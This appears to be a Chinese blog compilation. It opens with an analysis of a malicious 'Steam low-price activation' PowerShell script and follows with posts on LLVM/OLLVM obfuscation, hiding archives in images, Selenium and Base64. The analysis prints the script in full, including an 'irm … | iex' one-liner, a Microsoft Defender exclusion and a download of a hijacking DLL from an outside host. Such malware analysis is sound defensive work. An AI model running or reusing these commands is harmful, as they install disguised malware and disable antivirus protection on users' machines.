最近发现了一篇关于 Steam 低价激活脚本分析的文章。早就在 xhh 上听说这种脚本了，很感兴趣，便借着文章浅浅的探究一下。

核心就两个步骤:

• 步骤一：按住键盘win + X，找到powershell（终端管理员）
• 步骤二：输入irm 2[.]steam[.]work|iex（已去功能化）

提一下irm和iex：

irm 是一个用来从互联网下载内容的命令。

详细一点讲:

• irm 其实是 PowerShell 里的一个别名。
• 它的完整命令是 Invoke-RestMethod。
• 它的主要工作是向一个网址（URL）发送请求，并获取服务器返回的数据。

iex 是一个用来把纯文本（字符串）当作 PowerShell 命令来立即执行的命令。

• iex 也是一个别名。
• 它的全称是 Invoke-Expression（调用表达式）
• 它的工作极其简单粗暴：你给它一段纯文本（字符串），它会把这段文本当作 PowerShell 命令来立即执行。

这条指令就是下载 2.steam.work 网址上的所有文本，然后直接通过管道符(|)直接作为输入，给iex执行，这是及其危险的。

我们这里在虚拟机中利用

1

irm 2.steam.work > payload.txt

来把它的命令下载到文本文件中分析

PowerShell 命令分析

1
2
3
4
5
6
7
8

$steamRegPath = 'HKCU:\Software\Valve\Steam'
$localPath = Join-Path $env:LOCALAPPDATA "Steam"
if (Test-Path $steamRegPath) {
    $properties = Get-ItemProperty -Path $steamRegPath -ErrorAction SilentlyContinue
    if ($properties.PSObject.Properties.Name -contains 'SteamPath') {
        $steamPath = $properties.SteamPath
    }
}

简单的寻找 steam 客户端的安装路径

1
2
3
4
5
6
7

$currentPrincipal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
if (-not ($currentPrincipal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator))) {
    $bytes = [byte[]](91,232,175,183,233,135,141,230,150,176,230,137,147,229,188,128,80,111,119,101,114,32,115,104,101,108,108,32,230,137,147,229,188,128,230,150,185,229,188,143,228,187,165,231,174,161,231,144,134,229,145,152,232,186,171,228,187,189,232,191,144,232,161,140,93)
    $text = [System.Text.Encoding]::UTF8.GetString($bytes)
    Write-Host $text -ForegroundColor:red
    return
}

检查是否以管理员运行，若否，则输出[请重新打开Power shell 打开方式以管理员身份运行]。

接下来，脚本定义了一个函数Start-SteamOptimization，并且运行了它。

我们来分析这个函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

try {
    $security360check = $false
    if(Get-Process "360Tray*" -ErrorAction SilentlyContinue){
        $security360check = $true
        while(Get-Process "360Tray*" -ErrorAction SilentlyContinue){
            Write-Host "[360]" -ForegroundColor:Red
            Start-Sleep 1.5
        }
        Start-SteamOptimization
    }
    
    if(Get-Process "360sd*" -ErrorAction SilentlyContinue) {
        $security360check = $true
        while(Get-Process "360sd*" -ErrorAction SilentlyContinue){
            Write-Host "[360]" -ForegroundColor:Red
            Start-Sleep 1.5
        }
        Start-SteamOptimization
    }
    
    if ($security360check) {
        return
    }
}
catch {}

首先它先检查了360的相关进程，如果发现则不断打印红色的[360]，直到用户主动关闭360进程。

1
2
3
4
5
6

if ([string]::IsNullOrEmpty($steamPath)) {
    Write-Host "[Steam]" -ForegroundColor:Red
    return
}

Write-Host "[ServerStart        OK]" -ForegroundColor:green

接着它检查你的客户端是否安装了steam(非空)，过完上述检查后，打印服务启动成功。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

try {
    $processes = Get-Process -Name steam* -ErrorAction SilentlyContinue
    if ($processes) {
        $processes | ForEach-Object { $_.Kill() }
        Start-Sleep 1.5
    }
    
    if (Get-Process -Name "steam.exe" -ErrorAction SilentlyContinue) {
        $processes = Get-Process -Name "steam.exe" -ErrorAction SilentlyContinue
        if ($processes) {
            $processes | ForEach-Object { $_.Kill() }
            Start-Sleep 1
        }
    }
}
catch {}

简单来说，该代码段作用为：强行关闭所有正在运行的 Steam 进程

1
2
3
4
5
6
7
8
9

if (-not (Test-Path $localPath)) {
    try {
        New-Item -Path $localPath -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
        if (-not (Test-Path $localPath)) {
            New-Item $localPath -ItemType Directory -Force -ErrorAction SilentlyContinue | Out-Null
        }
    }
    catch {}
}

再次检查steam目录。因为脚本在后续步骤中需要下载（Payload 2）并写入一个名为 localData.vdf 的恶意文件到 $localPath 目录。

1
2
3
4
5

try {
    Add-MpPreference -ExclusionPath $steamPath -ErrorAction SilentlyContinue
    Start-Sleep 2
}
catch {}

Add-MpPreference: 这是一个 PowerShell Cmdlet，它的唯一作用就是修改 Microsoft Defender (Windows 默认杀毒软件) 的设置。

-ExclusionPath $steamPath: 这是它修改的具体设置。它告诉 Defender：“请将 $steamPath（即 Steam 的整个安装目录）添加到‘排除列表’(Exclusion list) 中。”

这样就能有效防止恶意dll的报错被杀。

1

Write-Host "[Result->0          OK]" -ForegroundColor:green

表示一个阶段的完成

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

try {
    $files = @(
        "version.dll",
        "user32.dll",
        "steam.cfg",
        "hid.dll",
        "/appcache/packageinfo.vdf"
    )
    
    foreach ($file in $files) {
        $targetPath = Join-Path $steamPath $file
        if (Test-Path $targetPath) {
            Remove-Item $targetPath -Force -ErrorAction SilentlyContinue | Out-Null
        }
    }
    
    $d = $steamPath + "/hid"
}
catch {
    $bytes = [byte[]](91,229,188,130,229,184,184,230,174,139,231,149,153,232,175,183,230,140,137,231,133,167,232,183,175,229,190,132,229,136,160,233,153,164,230,150,135,228,187,182,93,45,62)
    $text = [System.Text.Encoding]::UTF8.GetString($bytes)
    Write-Host "$text[$d]" -ForegroundColor:red
    return
}

尝试清除“同类”的文件，如果自动失败就打印[异常残留请按照路径删除文件]-> +路径，让用户手动清理。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

$downApi = "http://3.steam.work/api/v1/download/pwsDown"

try {
    irm -Uri $downApi -Method Post -Headers @{ Referer = "libary" } -OutFile $d -ErrorAction Stop
    $newFilePath = [System.IO.Path]::ChangeExtension($d, ".dll")
    Rename-Item -Path $d -NewName $newFilePath
    
    Write-Host "[Result->1          OK]" -ForegroundColor:green
    $d = $localPath + "/localData.vdf"
    irm -Uri $downApi -Method Post -Headers @{ Referer = "localData.vdf" } -OutFile $d -ErrorAction Stop
    Write-Host "[Result->2          OK]" -ForegroundColor:green
    
    Start-Sleep 1
}
catch {
    Write-Host "[Download Failed]" -ForegroundColor:Red
    return
}

主要是以特定方式请求，来下载相对应的文件。

Rename-Item -Path $d -NewName $newFilePath：这是实现 DLL 劫持的关键。 脚本先下载一个没有后缀的文件（hid），然后再将其重命名为 hid.dll。

意图： 直接下载 .dll 文件很容易被杀毒软件或防火墙拦截。通过“先下载，再重命名”的策略，大大提高了绕过检测的成功率。

1
2
3
4
5
6
7
8
9
10
11
12

   try {
       Start-Process "steam://" -ErrorAction SilentlyContinue
       $bytes = [byte[]](91,232,191,158,230,142,165,230,156,141,229,138,161,229,153,168,230,136,144,229,138,159,229,156,168,83,116,101,97,109,229,133,165,230,191,128,230,180,187,32,51,231,167,146,229,144,142,232,135,170,229,138,168,229,133,179,233,151,173,93)
       $text = [System.Text.Encoding]::UTF8.GetString($bytes)
       Write-Host $text -ForegroundColor:green
       Start-Sleep 3
   }
   catch {
       Write-Host "[Steam Start Failed]" -ForegroundColor:Red
   }

exit

触发攻击：启动 Steam，使其加载刚刚植入的恶意 DLL。

注：steam:// 是一个 URL 协议，Windows 会用它来启动 Steam 客户端。

顺便一提登陆成功后Start-Process 命令才会返回，输出[连接服务器成功在Steam入激活 3秒后自动关闭]，接着自然退出。

二进制文件后面有空再分析吧

关于空catch块

没有 try...catch 的情况 (正常情况)

在 PowerShell 中，当一个命令遇到“终止性错误”时，它会：

1. 立即停止脚本的执行。
2. 在控制台上打印出红色的、详细的错误信息。

2. 使用了空的 catch {} 块 (恶意软件的情况)

try...catch 结构就是为了改变这种默认行为而设计的。

• try { … } 的意思是：“尝试运行这里的代码。”
• catch { … } 的意思是：“如果 try 块中的代码失败了，不要崩溃，而是继续运行这里的代码。”

当 catch 块是空的时候，它的意思就变成了：“如果 try 块失败了，什么也不要做。不要打印信息，不要停止脚本，就假装什么都没发生过，然后继续往下走。”

文件篡改后果

1
2
3
4
5
6
7
8
9
10
11
12
13
14

# 原始 Steam 文件结构
Steam/
├── steam.exe
├── steamapps/
├── user32.dll    # 合法Windows组件
├── hid.dll       # 合法HID驱动
└── steam.cfg     # 客户端配置文件

# 脚本修改后
Steam/
├── steam.exe
├── steamapps/
├── hid.dll       # 被替换为未知文件
└── localData.vdf # 新增可疑配置文件

什么是LLVM

LLVM 是一个高度模块化、可重用的编译器基础框架。它通过统一的中间表示（IR）连接了编程语言和目标硬件，让创造新语言、支持新硬件变得更简单，同时提供了一流的代码优化能力。LLVM主要聚焦于编译器后端功能，如代码生成、代码优化、代码混淆、JIT等。

LLVM的架构

• LLVM大致架构与传统编译器相同，都由前端、优化器、后端组成。
• 但传统编译器的前端、优化器、后端是高度耦合的，对于不同的编程语言，往往需要不同的前端、优化器、后端来得到特定平台的机器码。
• 举个例子: 如果要支持 M 门语言和 N 个硬件平台，就需要开发近乎 M x N 个不同的编译器或进行大量的重复性适配工作，维护成本和开发难度极高。每新增一个支持，就需要M或N个编译器，或者大量的适配工作。
• 而LLVM则是将不同，因其引入了统一的中间表示，它更加“松散”。
• 同样的例子，LLVM新增支持可能仅需关心一对一，即如何到IR或者IR到新硬件平台的机器码。
• 工作流程表示:

源代码 (C++, Swift, Rust 等)
|
v
[ 前端：Clang / rustc 等 ]
|
v
LLVM 中间表示 (IR)
|
v
[ 优化器：进行各种代码优化 ]
|
v
优化后的 LLVM IR
|
v
[ 后端：针对 x86, ARM 等 ]
|
v
特定平台的机器码

前端 (Frontend)

• 作用：负责将各种不同的高级编程语言源代码，解析并转换为统一的、与语言无关的 LLVM IR。

优化器 (Optimizer)

• 作用：这是 LLVM 的核心。它接收来自前端生成的 LLVM IR，并对其进行一系列的分析和优化，目的是让代码运行得更快、体积更小，或者进行保护。

• 特点：过程完全独立于源代码语言和目标硬件的，为通用的优化层。

后端 (Backend)

• 作用：负责将经过优化器处理过的 LLVM IR，转换为特定硬件平台（CPU 架构）的原生机器码。

LLVM 是一个编译器基础设施（平台），而 Clang 是这个平台上最官方、最著名的前端之一。

广义的LLVM是指整个LLVM架构，一般狭义的LLVM指的是LLVM后端（包含代码优化和目标代码生成）。

代码混淆

定义：代码混淆是将计算机程序的代码，转换成一种功能上等价，但是难以阅读和理解的形式的行为。

开发者通常会编写自定义的 LLVM Pass 来实现一种或多种混淆技术。

一个著名且强大的的混淆技术就是控制流平坦化(Control Flow Flattening)

• 原始代码：代码有清晰的 if-else、for、while、switch 结构，其控制流图（CFG）逻辑清晰。

• 混淆后：

    - 将函数内所有的代码块（Basic Blocks）打散，放入一个巨大的 switch 语句中。  - 用一个主分发器（通常是一个 while 循环）来控制程序流程。  - 引入一个“状态变量”，循环的每一步都根据这个状态变量的值，switch 到对应的代码块去执行。  - 每个代码块执行完毕后，会修改这个状态变量，告诉主分发器下一步应该跳到哪里。

• 效果：原始的逻辑结构完全消失了，取而代-之的是一个巨大的、扁平的循环。逆向工程师无法再通过分析控制流图来理解程序逻辑，分析难度呈指数级上升。

学习混淆的意义

对于软件开发者：一定程度上防止代码被逆向破解

对于逆向工程师：帮助我们研究反混淆技术

这就得提到OLLVM了。

什么是OLLVM

OLLVM (Obfuscator-LLVM)：基于 LLVM 的代码混淆框架

核心定义与目标

OLLVM (Obfuscator-LLVM) 是一个著名的、基于 LLVM 框架的开源代码混淆项目。它最初由瑞士西北应用科技大学安全实验室于2010年发起，其核心目标是创建一个 LLVM 的特殊分支，通过在编译过程中自动注入代码混淆和防篡改逻辑，极大地提升逆向工程的分析门槛，从而增强软件的最终安全性。

技术实现原理：基于 Pass 的 IR 层混淆

OLLVM 的精髓在于其基于 Pass 的混淆机制。它完美利用了 LLVM 的模块化架构，在编译器的心脏地带——中间表示（IR）层面——进行操作。开发者通过编写一系列自定义的混淆 Pass（例如控制流平坦化、虚假控制流等），将原本结构清晰的 IR 代码变得逻辑复杂、难以理解。

由于后续的后端流程完全基于这份 IR 来生成机器码，因此这份复杂性便被忠实地保留在了最终的可执行文件中。

核心优势：跨语言与跨平台

得益于 LLVM 的解耦设计，OLLVM 的混淆能力是跨语言、跨平台的。原则上，任何能够被编译成 LLVM IR 的语言（如 C, C++, Objective-C 等），都能利用 OLLVM 进行混淆，并最终部署到 LLVM 支持的任意硬件平台（如 x86, ARM 等）上，而无需修改混淆逻辑本身。

项目现状与影响

OLLVM 本身是一个里程碑式的历史性项目，其官方支持的 LLVM 版本较为陈旧，目前已不再积极维护。

尽管如此，它的设计思想和开源实现对后来的代码混淆技术产生了深远的影响，催生了许多功能更强大、支持更新 LLVM 版本的现代化项目（例如 Hikari 等）。因此，OLLVM 至今仍是学习 LLVM Pass 开发和代码混淆技术的重要参考。

前言：一个神奇的现象

你是否曾在网上下载过一张看似普通的图片，却被告知“把后缀名改成.zip试试”？或者，你是否在CTF比赛中遇到过一张无法正常打开，却暗藏玄机的图片？

今天，我们就来揭开这个神奇现象背后的秘密——“图种”（Picture-Seed）。我们将从原理到实践，一步步带你了解为什么一张图片里，竟然可以藏着一个完整的压缩包。

画师/Artist: AmaiA
作品原址/Source: Pixiv

什么是“图种”？

“图种”，顾名思义，就是“图片种子”。这是一种将一个或多个文件（通常是压缩包）隐藏在一张图片文件中的技术。

从技术上讲，这是一种非常基础但有效的数据隐藏或文件合并技巧。

动手实践：制作一个自己的“图种”

在深入原理之前，让我们先亲手制作一个。

准备材料：

1. 一张图片，我们称之为 image.jpg。
2. 一个压缩包，我们称之为 archive.zip。（把任何你想隐藏的文件压缩一下即可）

操作步骤 (以Windows为例):

1. 将 image.jpg 和 archive.zip 放在同一个文件夹下。
2. 在该文件夹的地址栏输入 cmd 并回车，打开命令行窗口。

3. 输入以下命令并回车：

   1	copy /b image.jpg + archive.zip new_image.jpg

命令解析：

• copy：Windows的复制命令。
• /b：这个参数至关重要，它告诉 copy 命令以二进制模式（binary）来处理文件，确保文件内容在合并时不会因为遇到特殊字符而中断。
• image.jpg + archive.zip：表示将两个文件按顺序连接起来。
• new_image.jpg：这是我们最终输出的“图种”文件名。

深入原理

为什么同一个文件，图片查看器和压缩软件会看到不同的内容？答案在于它们解析（Parse）文件的方式不同。

核心原理： 不同的软件程序会根据自己感兴趣的文件头（Magic Number）和结束标记（End-of-File Marker）来读取文件。

1. 图片查看器的工作方式：

• 它打开文件，首先读取文件开头的几个字节——文件头。比如PNG的 89 50 4E 47。
• 识别出“哦，这是张PNG图片”后，它便开始按照PNG的格式规范来渲染图像。
• 当它读取到PNG的结束标记（如 IEND 块）时，它就认为图片已经完整了，工作到此结束。
• 对于文件结束标记之后的所有数据，它会选择完全忽略。

1. 压缩软件的工作方式：
   • 它被设计得非常健壮，会扫描整个文件，寻找它所认识的文件头，比如ZIP的 50 4B 03 04。
   • 当它在文件的中间部分找到了这个“接头暗号”，它就会忽略之前所有的数据（在它看来是无用的“垃圾数据”）。
   • 从这个ZIP文件头开始，它将后续的数据视为一个标准的压缩包进行处理，并成功读取出压缩包内的文件列表。

简单来说，就是两个程序各取所需，互不干扰，共同造就了这个神奇的“伪装术”。

值得一提的是文件扩展名的原理，因为这是多数人日常中使用最多的文件判断方式

文件扩展名的实现原理

文件扩展名的实现原理并非单一的技术，而是一个建立在操作系统、应用程序和用户习惯之上的约定和关联机制。核心可以分解为以下几个层面：

1. 操作系统层面的“注册表”或“关联数据库”

这是最核心的实现机制。每个主流操作系统都有一个地方，像一本“字典”或“注册表”，记录着文件扩展名和应用程序之间的对应关系。

• 在 Windows 中： 这个“字典”就是大名鼎鼎的注册表（Registry）。在注册表的 HKEY_CLASSES_ROOT 项下，详细定义了几乎所有已知的文件扩展名。
  • 例如，它会记录 .docx 这个扩展名关联的 ProgID (Programmatic Identifier)，比如 Word.Document.12。
  • 接着，系统会查找 Word.Document.12 这个 ProgID，找到它所关联的打开命令，通常指向 WINWORD.EXE 这个程序，并附带参数告诉程序要打开哪个文件。
• 在 macOS 中： 这个机制由 Launch Services (启动服务) 管理。系统维护着一个数据库，这个数据库通过应用程序的 Info.plist 文件来建立。
  • 每个应用程序的 Info.plist 文件中会声明它可以处理哪些 UTI (Uniform Type Identifier)，例如 com.microsoft.word.docx。
  • 同时，系统会把文件扩展名 .docx 映射到这个 UTI。当你双击文件时，Launch Services 会查找哪个应用程序声明了可以处理这个 UTI，然后启动它。
• 在 Linux (桌面环境如 GNOME, KDE) 中： 这个机制基于 MIME 类型 (Multipurpose Internet Mail Extensions) 和 .desktop 文件。
  • 系统有一个 MIME 数据库（例如 mime.types 文件），它将文件扩展名（如 .pdf）映射到一个 MIME 类型（如 application/pdf）。
  • 然后，在 /usr/share/applications/ 等目录下的 .desktop 文件中，每个应用程序会声明它可以打开哪些 MIME 类型。
  • 当你双击文件时，桌面环境会查询文件的 MIME 类型，然后找到一个合适的 .desktop 文件来启动对应的程序。

2. 应用程序层面的“自我声明”

操作系统如何知道 .docx 应该由 Word 打开呢？这源于应用程序在安装时的“自我声明”或“注册”过程。

1. 安装过程：当你安装 Microsoft Office 或 WPS Office 时，安装程序会主动与操作系统交互。
2. 写入关联信息：它会向操作系统的“注册表”或“关联数据库”中写入信息，告诉系统：“你好，我是 Word/WPS，以后凡是遇到 .docx, .doc 等文件，都请交给我来处理。”
3. 更新默认程序：如果电脑上装了多个可以处理 .docx 的程序，操作系统会根据用户的选择或软件的设置，确定一个默认程序。这个默认程序的关联信息会被优先使用。

3. 文件系统层面的“无知”

这是一个非常关键但容易被忽略的点：文件系统本身对文件扩展名是一无所知的。

对于文件系统（如 NTFS, APFS, EXT4）来说，mydocument.docx 仅仅是一个由 m-y-d-o-c-u-m-e-n-t-.-d-o-c-x 字符串组成的文件名。扩展名 .docx 对于文件系统而言，与文件名中的其他任何字符没有本质区别。它不会因为这个扩展名而对文件做任何特殊处理。

文件扩展名的“魔力”完全是由上层的操作系统和应用程序赋予的。

实现原理总结

将整个流程串联起来，当你双击一个名为 report.pdf 的文件时，发生的事情是：

1. 用户操作：你双击了 report.pdf 文件。
2. 操作系统捕获事件：操作系统（或其图形化外壳 Shell）接收到这个双击事件。
3. 解析文件名：操作系统查看文件名，并识别出最后的 .pdf 部分作为文件扩展名。
4. 查询关联数据库:
   • Windows 会去查注册表，找到 .pdf 关联的程序，比如 Adobe Acrobat Reader 。
   • macOS 会通过 Launch Services，查找 .pdf 对应的 UTI (com.adobe.pdf)，然后找到声明能处理此 UTI 的程序。
   • Linux 会查找 .pdf 对应的 MIME 类型 (application/pdf)，然后找到关联这个 MIME 类型的 .desktop 文件，并执行其中的命令。
5. 启动应用程序：操作系统执行找到的命令，启动对应的应用程序（如 Adobe Acrobat Reader），并将 report.pdf 的完整文件路径作为参数传递给它。
6. 应用程序加载文件：Adobe Acrobat Reader 启动后，接收到文件路径参数，然后打开并显示 report.pdf 的内容。

因此，文件扩展名的实现原理本质上是一个基于“约定”的、由操作系统维护的“查找表”机制，它将文件名中的一小段字符串（扩展名）与具体的应用程序行为绑定在了一起。

然而，不同于人的判断方法，操作系统通过解析可执行文件的文件头，来理解程序的结构和需求，然后由加载器（Loader）将文件内容正确地映射到**内存中，最后把控制权交给CPU，从指定的入口点开始执行内存中的机器码

扩展与联想：更多类似的方法

“图种”只是信息隐藏世界的冰山一角。基于类似的“利用文件结构差异”的原理，还衍生出了许多有趣的技术：

• 其他文件合并： 如 HTML + ZIP 的组合。
• 元数据隐藏： 将信息藏在图片的EXIF信息或MP3的ID3标签里。
• LSB隐写： 修改图片像素中人眼无法分辨的最低有效位来隐藏数据。
• NTFS交换数据流： Windows文件系统特有的文件“背后”藏文件的黑魔法。

总结

通过今天的探索，我们不仅学会了如何制作一个“图种”，更重要的是理解了其背后的计算机基础原理——文件皆为二进制，程序按需来解析。

目录

• 简介
• 环境准备
• 第一个 Selenium 脚本
• 常见元素定位方式
• 常见网页操作
• 等待机制
• 实战任务示例
• 常见问题排查

简介

Selenium 是一个用于自动化浏览器操作的工具，常用于：

• 自动化测试
• 爬虫抓取网页数据
• 自动化任务（如刷网页、填表单等）

环境准备

安装 Selenium

1

pip install selenium

下载 ChromeDriver

1. 查浏览器版本：在 Chrome 地址栏输入 chrome://version/
2. 下载对应版本驱动：https://googlechromelabs.github.io/chrome-for-testing/
3. 解压后将 chromedriver.exe：
   • 放入脚本目录，或
   • 添加到系统环境变量 Path

第一个 Selenium 脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

from selenium import webdriver
from selenium.webdriver.common.by import By
import time

# 启动浏览器
driver = webdriver.Chrome()

# 打开网页
driver.get("https://www.bing.com")

# 输入关键词
search_box = driver.find_element(By.NAME, "q")
search_box.send_keys("Selenium 教程")

# 提交搜索
search_box.submit()

# 等待几秒
time.sleep(5)

# 关闭浏览器
driver.quit()

常见元素定位方式

常见网页操作

1
2
3
4
5
6
7

element.send_keys("输入内容")     # 输入文本
element.click()                  # 点击元素
element.clear()                  # 清空输入框
driver.back()                    # 回退
driver.forward()                 # 前进
driver.refresh()                 # 刷新页面
driver.get_screenshot_as_file("screenshot.png")  # 截图

等待机制

显式等待（推荐）

1
2
3
4
5

from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC

wait = WebDriverWait(driver, 10)
element = wait.until(EC.presence_of_element_located((By.ID, "some_id")))

实战任务示例：百度搜索“Python”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

from selenium import webdriver
from selenium.webdriver.common.by import By
import time

driver = webdriver.Chrome()
driver.get("https://www.baidu.com")

search = driver.find_element(By.ID, "kw")
search.send_keys("Python")

button = driver.find_element(By.ID, "su")
button.click()

time.sleep(5)
driver.quit()

常见问题排查

附录

查看浏览器版本

• Chrome 地址栏输入：chrome://version

ChromeDriver 下载地址

• https://googlechromelabs.github.io/chrome-for-testing/

参考仓库

• https://github.com/christian-bromann/awesome-selenium
• https://github.com/Jack-Cherish/python-spider(丰富示例)

目录

• Base64是什么
• 为什么要使用Base64（应用场景）
• Base64的编码原理
• 关于填充字符”=”
• Base64 Data URI格式
• 总结

Base64是什么

Base64 是一种基于64个可打印字符来表示二进制数据的编码方法。它将每6个比特（bit）作为一个单元，对应码表中的一个可打印字符。根据这个规则，3个字节（24比特）的数据恰好可以由4个Base64字符来表示。

需要特别注意的是，Base64是一种编码（Encoding）方式，而不是加密（Encryption）算法，因此不具备任何保密性。

注：一个标准的ASCII字符由1个字节（8比特）表示。

为什么要使用Base64（应用场景）

你可能会问，既然会增大体积，为什么还需要Base64呢？

这是因为在网络传输中，有些协议或环境只支持传输文本字符（如ASCII字符）。当需要传输图片、音频等二进制数据时，直接传输可能会导致数据损坏或解析错误。将二进制数据编码为纯文本的Base64格式，可以确保数据在任何文本环境中都能被安全、正确地传输。

常见应用场景包括：

• Data URI：在HTML或CSS中直接嵌入图片等小型二进制资源。
• 电子邮件（MIME）：在邮件中附加二进制文件。
• Web API：在JSON或XML这类基于文本的格式中包含二进制内容。

Base64的编码原理

Base64的编码过程可以分为以下几个步骤：

1. 分组：将原始二进制数据每3个字节（24比特）作为一大组。
2. 拆分：将这个24比特的大组拆分为4个小组，每个小组6个比特。
3. 查表：将每个6比特的小组转换成十进制数，这个数就是其在Base64码表中的索引。根据索引找到对应的字符。
4. 拼接：将得到的4个字符拼接起来，即为编码后的结果。

Base64码表

Base64使用的64个字符包括：A-Z、a-z、0-9、+ 和 /。

关于填充字符"="

当原始数据的字节数不是3的整数倍时，编码到最后会剩下1或2个字节。此时就需要用 =作为填充字符，以确保最终的Base64字符串长度是4的倍数。

• 剩下1个字节：在其二进制（8比特）后补 0000，凑成12比特，然后拆分为两个6比特的小组进行编码，最后在结果末尾补充两个 =。
• 剩下2个字节：在其二进制（16比特）后补 00，凑成18比特，然后拆分为三个6比特的小组进行编码，最后在结果末尾补充一个 =。

例如：

• 0neqiu（6字节）编码为 MG5lcWl1 (8字符，无需填充)。
• 0neqi（5字节）编码为 MG5lcWk= (8字符，填充一个=)。

Base64 Data URI格式

在Web开发中，有时会看到形如下方的Base64字符串：

1

data:image/jpeg;base64,/9j/4AA...

这被称为Data URI。它允许将数据（如此处的JPEG图片）直接嵌入到网页文档中。浏览器可以直接解析并显示它。

需要注意的是，data:image/jpeg;base64,这部分是头部信息，并非Base64内容本身。如果你需要提取原始的Base64编码，应当只取逗号 ,之后的部分。

总结

• 是什么：Base64是一种将二进制数据转换为文本字符的编码方案。
• 为什么用：为了在只支持文本的环境中安全地传输二进制数据。
• 如何工作：将每3个字节（24比特）的数据转换为4个可打印字符。
• 特点：编码后的数据体积会增大约33%，它不是加密算法。
• 填充：当原始数据长度不是3的倍数时，使用 =进行填充。

引用文章:

让你彻底理解Base64算法（Base64是什么，Base64解决什么问题，Base64字符串末尾的=是什么） - 知乎

什么是Base64算法？——全网最详细讲解